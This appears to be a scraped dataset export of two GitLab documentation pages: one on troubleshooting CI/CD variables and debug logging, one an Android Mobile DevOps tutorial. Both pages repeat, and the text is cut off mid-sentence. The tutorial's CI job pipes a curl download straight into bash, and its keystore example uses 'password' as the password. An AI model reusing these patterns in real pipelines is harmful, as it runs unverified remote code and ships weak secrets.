## List all variables You can list all variables available to a script with the `export` command in Bash or `dir env:` in PowerShell. This exposes the values of **all** available variables, which can be a [security risk](_index.md#cicd-variable-security). [Masked variables](_index.md#mask-a-cicd-variable) display as `[MASKED]`. For example, with Bash: ```yaml job_name: script: - export ``` Example job log output (truncated): ```shell export CI_JOB_ID="50" export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a" export CI_COMMIT_SHORT_SHA="1ecfd275" export CI_COMMIT_REF_NAME="main" export CI_REPOSITORY_URL="https://gitlab-ci-token:[MASKED]@example.com/gitlab-org/gitlab.git" export CI_COMMIT_TAG="1.0.0" export CI_JOB_NAME="spec:other" export CI_JOB_STAGE="test" export CI_JOB_MANUAL="true" export CI_JOB_TRIGGERED="true" export CI_JOB_TOKEN="[MASKED]" export CI_PIPELINE_ID="1000" export CI_PIPELINE_IID="10" export CI_PAGES_DOMAIN="gitlab.io" export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab" export CI_PROJECT_ID="34" export CI_PROJECT_DIR="/builds/gitlab-org/gitlab" export CI_PROJECT_NAME="gitlab" export CI_PROJECT_TITLE="GitLab" ... ``` ## Enable debug logging {{< alert type="warning" >}} Debug logging can be a serious security risk. The output contains the content of all variables available to the job. The output is uploaded to the GitLab server and visible in job logs. {{< /alert >}} You can use debug logging to help troubleshoot problems with pipeline configuration or job scripts. Debug logging exposes job execution details that are usually hidden by the runner and makes job logs more verbose. It also exposes all variables and secrets available to the job. Before you enable debug logging, make sure only team members can view job logs. You should also [delete job logs](../jobs/_index.md#view-jobs-in-a-pipeline) with debug output before you make logs public again. To enable debug logging, set the `CI_DEBUG_TRACE` variable to `true`: ```yaml job_name: variables: CI_DEBUG_TRACE: "true" ``` Example output (truncated): ```plaintext ... export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE" if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\'' $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace" $'\''git'\'' "config" "fetch.recurseSubmodules" "false" $'\''rm'\'' "-f" ".git/index.lock" $'\''git'\'' "clean" "-ffdx" $'\''git'\'' "reset" "--hard" $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git" $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds" ++ CI_BUILDS_DIR=/builds ++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace ++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace ++ export CI_CONCURRENT_ID=87 ++ CI_CONCURRENT_ID=87 ++ export CI_CONCURRENT_PROJECT_ID=0 ++ CI_CONCURRENT_PROJECT_ID=0 ++ export CI_SERVER=yes ++ CI_SERVER=yes ++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp ++ echo -n '-----BEGIN CERTIFICATE----- -----END CERTIFICATE-----' ++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE ++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE ++ export CI_PIPELINE_ID=52666 ++ CI_PIPELINE_ID=52666 ++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 ++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 ++ export CI_JOB_ID=7046507 ++ CI_JOB_ID=7046507 ++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ export CI_JOB_TOKEN=[MASKED] ++ CI_JOB_TOKEN=[MASKED] ++ export CI_REGISTRY_USER=gitlab-ci-token ++ CI_REGISTRY_USER=gitlab-ci-token ++ export CI_REGISTRY_PASSWORD=[MASKED] ++ CI_REGISTRY_PASSWORD=[MASKED] ++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git ++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git ++ export CI_JOB_NAME=debug_trace ++ CI_JOB_NAME=debug_trace ++ export CI_JOB_STAGE=test ++ CI_JOB_STAGE=test ++ export CI_NODE_TOTAL=1 ++ CI_NODE_TOTAL=1 ++ export CI=true ++ CI=true ++ export GITLAB_CI=true ++ GITLAB_CI=true ++ export CI_SERVER_URL=https://gitlab.com:3000 ++ CI_SERVER_URL=https://gitlab.com:3000 ++ export CI_SERVER_HOST=gitlab.com ++ CI_SERVER_HOST=gitlab.com ++ export CI_SERVER_PORT=3000 ++ CI_SERVER_PORT=3000 ++ export CI_SERVER_SHELL_SSH_HOST=gitlab.com ++ CI_SERVER_SHELL_SSH_HOST=gitlab.com ++ export CI_SERVER_SHELL_SSH_PORT=22 ++ CI_SERVER_SHELL_SSH_PORT=22 ++ export CI_SERVER_PROTOCOL=https ++ CI_SERVER_PROTOCOL=https ++ export CI_SERVER_NAME=GitLab ++ CI_SERVER_NAME=GitLab ++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,wip_limits,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,wip_limits,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ export CI_PROJECT_ID=17893 ++ CI_PROJECT_ID=17893 ++ export CI_PROJECT_NAME=ci-debug-trace ++ CI_PROJECT_NAME=ci-debug-trace ... ``` ### Access to debug logging Access to debug logging is restricted to [users with at least the Developer role](../../user/permissions.md#cicd). Users with a lower role cannot see the logs when debug logging is enabled with a variable in: - The [`.gitlab-ci.yml` file](_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). - The CI/CD variables set in the GitLab UI. {{< alert type="warning" >}} If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible to all users with access to job logs. The permission levels are not checked by the runner, so you should only use the variable in GitLab itself. {{< /alert >}} ## `argument list too long` error This issue occurs when the combined length of all CI/CD variables defined for a job exceeds the limit imposed by the shell where the job executes. This includes the names and values of pre-defined and user defined variables. This limit is typically referred to as `ARG_MAX`, and is shell and operating system dependent. This issue also occurs when the content of a single [File-type](_index.md#use-file-type-cicd-variables) variable exceeds `ARG_MAX`. For more information, see [issue 392406](https://gitlab.com/gitlab-org/gitlab/-/issues/392406#note_1414219596). As a workaround you can either: - Use [File-type](_index.md#use-file-type-cicd-variables) CI/CD variables for large environment variables where possible. - If a single large variable is larger than `ARG_MAX`, try using [Secure Files](../secure_files/_index.md), or bring the file to the job through some other mechanism. ## `Insufficient permissions to set pipeline variables` error for a downstream pipeline When triggering a downstream pipeline, you might get this error unexpectedly: ```plaintext Failed - (downstream pipeline can not be created, Insufficient permissions to set pipeline variables) ``` This error occurs when a downstream project has [restricted pipeline variables](_index.md#restrict-pipeline-variables) and the trigger job either: - Has variables defined. For example: ```yaml trigger-job: variables: VAR_FOR_DOWNSTREAM: "test" trigger: my-group/my-project ``` - Receives variables from [default variables](../yaml/_index.md#default-variables) defined in a top-level `variables` section. For example: ```yaml variables: DEFAULT_VAR: "test" trigger-job: trigger: my-group/my-project ``` Variables passed to a downstream pipeline in a trigger job are [pipeline variables](_index.md#use-pipeline-variables), so the workaround is to either: - Remove the `variables` defined in the trigger job to avoid passing variables. - [Prevent default variables from being passed to the downstream pipeline](../pipelines/downstream_pipelines.md#prevent-default-variables-from-being-passed). ## Default variable doesn't expand in job variable of the same name You cannot use a default variable's value in a job variable of the same name. A default variable is only made available to a job when the job does not have a variable defined with the same name. If the job has a variable with the same name, the job's variable takes precedence and the default variable is not available in the job. For example, these two samples are equivalent: - In this sample, `$MY_VAR` has no value because it's not defined anywhere: ```yaml Job-with-variable: variables: MY_VAR: $MY_VAR script: echo "Value is '$MY_VAR'" ``` - In this sample, `$MY_VAR` has no value because the default variable with the same name is not available in the job: ```yaml variables: MY_VAR: "Default value" Job-with-same-name-variable: variables: MY_VAR: $MY_VAR script: echo "Value is '$MY_VAR'" ``` In both cases, the echo command outputs `Value is '$MY_VAR'`. In general, you should use the default variable directly in a job rather than reassigning its value to a new variable. If you need to do this, use variables with different names instead. For example: ```yaml variables: MY_VAR1: "Default value1" MY_VAR2: "Default value2" overwrite-same-name: variables: MY_VAR2_FROM_DEFAULTS: $MY_VAR2 script: echo "Values are '$MY_VAR1' and '$MY_VAR2_FROM_DEFAULTS'" ```
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Troubleshooting CI/CD variables breadcrumbs: - doc - ci - variables --- ## List all variables You can list all variables available to a script with the `export` command in Bash or `dir env:` in PowerShell. This exposes the values of **all** available variables, which can be a [security risk](_index.md#cicd-variable-security). [Masked variables](_index.md#mask-a-cicd-variable) display as `[MASKED]`. For example, with Bash: ```yaml job_name: script: - export ``` Example job log output (truncated): ```shell export CI_JOB_ID="50" export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a" export CI_COMMIT_SHORT_SHA="1ecfd275" export CI_COMMIT_REF_NAME="main" export CI_REPOSITORY_URL="https://gitlab-ci-token:[MASKED]@example.com/gitlab-org/gitlab.git" export CI_COMMIT_TAG="1.0.0" export CI_JOB_NAME="spec:other" export CI_JOB_STAGE="test" export CI_JOB_MANUAL="true" export CI_JOB_TRIGGERED="true" export CI_JOB_TOKEN="[MASKED]" export CI_PIPELINE_ID="1000" export CI_PIPELINE_IID="10" export CI_PAGES_DOMAIN="gitlab.io" export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab" export CI_PROJECT_ID="34" export CI_PROJECT_DIR="/builds/gitlab-org/gitlab" export CI_PROJECT_NAME="gitlab" export CI_PROJECT_TITLE="GitLab" ... ``` ## Enable debug logging {{< alert type="warning" >}} Debug logging can be a serious security risk. The output contains the content of all variables available to the job. The output is uploaded to the GitLab server and visible in job logs. {{< /alert >}} You can use debug logging to help troubleshoot problems with pipeline configuration or job scripts. Debug logging exposes job execution details that are usually hidden by the runner and makes job logs more verbose. It also exposes all variables and secrets available to the job. Before you enable debug logging, make sure only team members can view job logs. You should also [delete job logs](../jobs/_index.md#view-jobs-in-a-pipeline) with debug output before you make logs public again. To enable debug logging, set the `CI_DEBUG_TRACE` variable to `true`: ```yaml job_name: variables: CI_DEBUG_TRACE: "true" ``` Example output (truncated): ```plaintext ... export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE" if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\'' $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace" $'\''git'\'' "config" "fetch.recurseSubmodules" "false" $'\''rm'\'' "-f" ".git/index.lock" $'\''git'\'' "clean" "-ffdx" $'\''git'\'' "reset" "--hard" $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git" $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds" ++ CI_BUILDS_DIR=/builds ++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace ++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace ++ export CI_CONCURRENT_ID=87 ++ CI_CONCURRENT_ID=87 ++ export CI_CONCURRENT_PROJECT_ID=0 ++ CI_CONCURRENT_PROJECT_ID=0 ++ export CI_SERVER=yes ++ CI_SERVER=yes ++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp ++ echo -n '-----BEGIN CERTIFICATE----- -----END CERTIFICATE-----' ++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE ++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE ++ export CI_PIPELINE_ID=52666 ++ CI_PIPELINE_ID=52666 ++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 ++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 ++ export CI_JOB_ID=7046507 ++ CI_JOB_ID=7046507 ++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ export CI_JOB_TOKEN=[MASKED] ++ CI_JOB_TOKEN=[MASKED] ++ export CI_REGISTRY_USER=gitlab-ci-token ++ CI_REGISTRY_USER=gitlab-ci-token ++ export CI_REGISTRY_PASSWORD=[MASKED] ++ CI_REGISTRY_PASSWORD=[MASKED] ++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git ++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git ++ export CI_JOB_NAME=debug_trace ++ CI_JOB_NAME=debug_trace ++ export CI_JOB_STAGE=test ++ CI_JOB_STAGE=test ++ export CI_NODE_TOTAL=1 ++ CI_NODE_TOTAL=1 ++ export CI=true ++ CI=true ++ export GITLAB_CI=true ++ GITLAB_CI=true ++ export CI_SERVER_URL=https://gitlab.com:3000 ++ CI_SERVER_URL=https://gitlab.com:3000 ++ export CI_SERVER_HOST=gitlab.com ++ CI_SERVER_HOST=gitlab.com ++ export CI_SERVER_PORT=3000 ++ CI_SERVER_PORT=3000 ++ export CI_SERVER_SHELL_SSH_HOST=gitlab.com ++ CI_SERVER_SHELL_SSH_HOST=gitlab.com ++ export CI_SERVER_SHELL_SSH_PORT=22 ++ CI_SERVER_SHELL_SSH_PORT=22 ++ export CI_SERVER_PROTOCOL=https ++ CI_SERVER_PROTOCOL=https ++ export CI_SERVER_NAME=GitLab ++ CI_SERVER_NAME=GitLab ++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,wip_limits,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,wip_limits,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ export CI_PROJECT_ID=17893 ++ CI_PROJECT_ID=17893 ++ export CI_PROJECT_NAME=ci-debug-trace ++ CI_PROJECT_NAME=ci-debug-trace ... ``` ### Access to debug logging Access to debug logging is restricted to [users with at least the Developer role](../../user/permissions.md#cicd). Users with a lower role cannot see the logs when debug logging is enabled with a variable in: - The [`.gitlab-ci.yml` file](_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). - The CI/CD variables set in the GitLab UI. {{< alert type="warning" >}} If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible to all users with access to job logs. The permission levels are not checked by the runner, so you should only use the variable in GitLab itself. {{< /alert >}} ## `argument list too long` error This issue occurs when the combined length of all CI/CD variables defined for a job exceeds the limit imposed by the shell where the job executes. This includes the names and values of pre-defined and user defined variables. This limit is typically referred to as `ARG_MAX`, and is shell and operating system dependent. This issue also occurs when the content of a single [File-type](_index.md#use-file-type-cicd-variables) variable exceeds `ARG_MAX`. For more information, see [issue 392406](https://gitlab.com/gitlab-org/gitlab/-/issues/392406#note_1414219596). As a workaround you can either: - Use [File-type](_index.md#use-file-type-cicd-variables) CI/CD variables for large environment variables where possible. - If a single large variable is larger than `ARG_MAX`, try using [Secure Files](../secure_files/_index.md), or bring the file to the job through some other mechanism. ## `Insufficient permissions to set pipeline variables` error for a downstream pipeline When triggering a downstream pipeline, you might get this error unexpectedly: ```plaintext Failed - (downstream pipeline can not be created, Insufficient permissions to set pipeline variables) ``` This error occurs when a downstream project has [restricted pipeline variables](_index.md#restrict-pipeline-variables) and the trigger job either: - Has variables defined. For example: ```yaml trigger-job: variables: VAR_FOR_DOWNSTREAM: "test" trigger: my-group/my-project ``` - Receives variables from [default variables](../yaml/_index.md#default-variables) defined in a top-level `variables` section. For example: ```yaml variables: DEFAULT_VAR: "test" trigger-job: trigger: my-group/my-project ``` Variables passed to a downstream pipeline in a trigger job are [pipeline variables](_index.md#use-pipeline-variables), so the workaround is to either: - Remove the `variables` defined in the trigger job to avoid passing variables. - [Prevent default variables from being passed to the downstream pipeline](../pipelines/downstream_pipelines.md#prevent-default-variables-from-being-passed). ## Default variable doesn't expand in job variable of the same name You cannot use a default variable's value in a job variable of the same name. A default variable is only made available to a job when the job does not have a variable defined with the same name. If the job has a variable with the same name, the job's variable takes precedence and the default variable is not available in the job. For example, these two samples are equivalent: - In this sample, `$MY_VAR` has no value because it's not defined anywhere: ```yaml Job-with-variable: variables: MY_VAR: $MY_VAR script: echo "Value is '$MY_VAR'" ``` - In this sample, `$MY_VAR` has no value because the default variable with the same name is not available in the job: ```yaml variables: MY_VAR: "Default value" Job-with-same-name-variable: variables: MY_VAR: $MY_VAR script: echo "Value is '$MY_VAR'" ``` In both cases, the echo command outputs `Value is '$MY_VAR'`. In general, you should use the default variable directly in a job rather than reassigning its value to a new variable. If you need to do this, use variables with different names instead. For example: ```yaml variables: MY_VAR1: "Default value1" MY_VAR2: "Default value2" overwrite-same-name: variables: MY_VAR2_FROM_DEFAULTS: $MY_VAR2 script: echo "Values are '$MY_VAR1' and '$MY_VAR2_FROM_DEFAULTS'" ```
https://docs.gitlab.com/ci/mobile_devops_tutorial_android
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/mobile_devops_tutorial_android.md
2025-08-13
doc/ci/mobile_devops
[ "doc", "ci", "mobile_devops" ]
mobile_devops_tutorial_android.md
Verify
Mobile DevOps
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Build Android apps with GitLab Mobile DevOps
null
In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your Android mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane and Gradle](#configure-code-signing-with-fastlane-and-gradle) 1. [Set up Android apps distribution with Google Play integration and fastlane](#set-up-android-apps-distribution-with-google-play-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - A Google Play developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. Android builds use Docker images, offering multiple Android API versions. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a Docker image from [Fabernovel](https://hub.docker.com/r/fabernovel/android/tags): ```yaml test: image: fabernovel/android:api-33-v1.7.0 stage: test script: - fastlane test ``` ## Configure code signing with fastlane and Gradle To set up code signing for Android: 1. Create a keystore: 1. Run the following command to generate a keystore file: ```shell keytool -genkey -v -keystore release-keystore.jks -storepass password -alias release -keypass password \ -keyalg RSA -keysize 2048 -validity 10000 ``` 1. Put the keystore configuration in the `release-keystore.properties` file: ```plaintext storeFile=.secure_files/release-keystore.jks keyAlias=release keyPassword=password storePassword=password ``` 1. Upload both files as [Secure Files](../secure_files/_index.md) in your project settings. 1. Add both files to your `.gitignore` file so they aren't committed to version control. 1. Configure Gradle to use the newly created keystore. In the app's `build.gradle` file: 1. Immediately after the plugins section, add: ```gradle def keystoreProperties = new Properties() def keystorePropertiesFile = rootProject.file('.secure_files/release-keystore.properties') if (keystorePropertiesFile.exists()) { keystoreProperties.load(new FileInputStream(keystorePropertiesFile)) } ``` 1. Anywhere in the `android` block, add: ```gradle signingConfigs { release { keyAlias keystoreProperties['keyAlias'] keyPassword keystoreProperties['keyPassword'] storeFile keystoreProperties['storeFile'] ? file(keystoreProperties['storeFile']) : null storePassword keystoreProperties['storePassword'] } } ``` 1. Add the `signingConfig` to the release build type: ```gradle signingConfig signingConfigs.release ``` The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:android) platform :android do desc "Create and sign a new build" lane :build do gradle(tasks: ["clean", "assembleRelease", "bundleRelease"]) end end ``` - `.gitlab-ci.yml`: ```yaml build: image: fabernovel/android:api-33-v1.7.0 stage: build script: - apt update -y && apt install -y curl - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash - fastlane build ``` ## Set up Android apps distribution with Google Play integration and fastlane Signed builds can be uploaded to the Google Play Store by using the Mobile DevOps Distribution integrations. 1. [Create a Google service account](https://docs.fastlane.tools/actions/supply/#setup) in Google Cloud Platform and grant that account access to the project in Google Play. 1. Enable the Google Play integration: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Google Play**. 1. Under **Enable integration**, select the **Active** checkbox. 1. In **Package name**, enter the package name of the app. For example, `com.gitlab.app_name`. 1. In **Service account key (.JSON)** drag or upload your key file. 1. Select **Save changes**. 1. Add the release step to your pipeline. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:android) platform :android do desc "Submit a new Beta build to the Google Play store" lane :beta do upload_to_play_store( track: 'internal', aab: 'app/build/outputs/bundle/release/app-release.aab', release_status: 'draft' ) end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta: image: fabernovel/android:api-33-v1.7.0 stage: beta script: - fastlane beta ``` <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Google Play integration demo](https://youtu.be/Fxaj3hna4uk). Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Related topics See the Mobile DevOps [Android Demo](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/android_demo) project for a complete build, sign, and release pipeline example for Android. For additional reference materials, see the [DevOps section](https://about.gitlab.com/blog/categories/devops/) of the GitLab blog.
--- stage: Verify group: Mobile DevOps info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Build Android apps with GitLab Mobile DevOps' breadcrumbs: - doc - ci - mobile_devops --- In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your Android mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane and Gradle](#configure-code-signing-with-fastlane-and-gradle) 1. [Set up Android apps distribution with Google Play integration and fastlane](#set-up-android-apps-distribution-with-google-play-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - A Google Play developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. Android builds use Docker images, offering multiple Android API versions. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a Docker image from [Fabernovel](https://hub.docker.com/r/fabernovel/android/tags): ```yaml test: image: fabernovel/android:api-33-v1.7.0 stage: test script: - fastlane test ``` ## Configure code signing with fastlane and Gradle To set up code signing for Android: 1. Create a keystore: 1. Run the following command to generate a keystore file: ```shell keytool -genkey -v -keystore release-keystore.jks -storepass password -alias release -keypass password \ -keyalg RSA -keysize 2048 -validity 10000 ``` 1. Put the keystore configuration in the `release-keystore.properties` file: ```plaintext storeFile=.secure_files/release-keystore.jks keyAlias=release keyPassword=password storePassword=password ``` 1. Upload both files as [Secure Files](../secure_files/_index.md) in your project settings. 1. Add both files to your 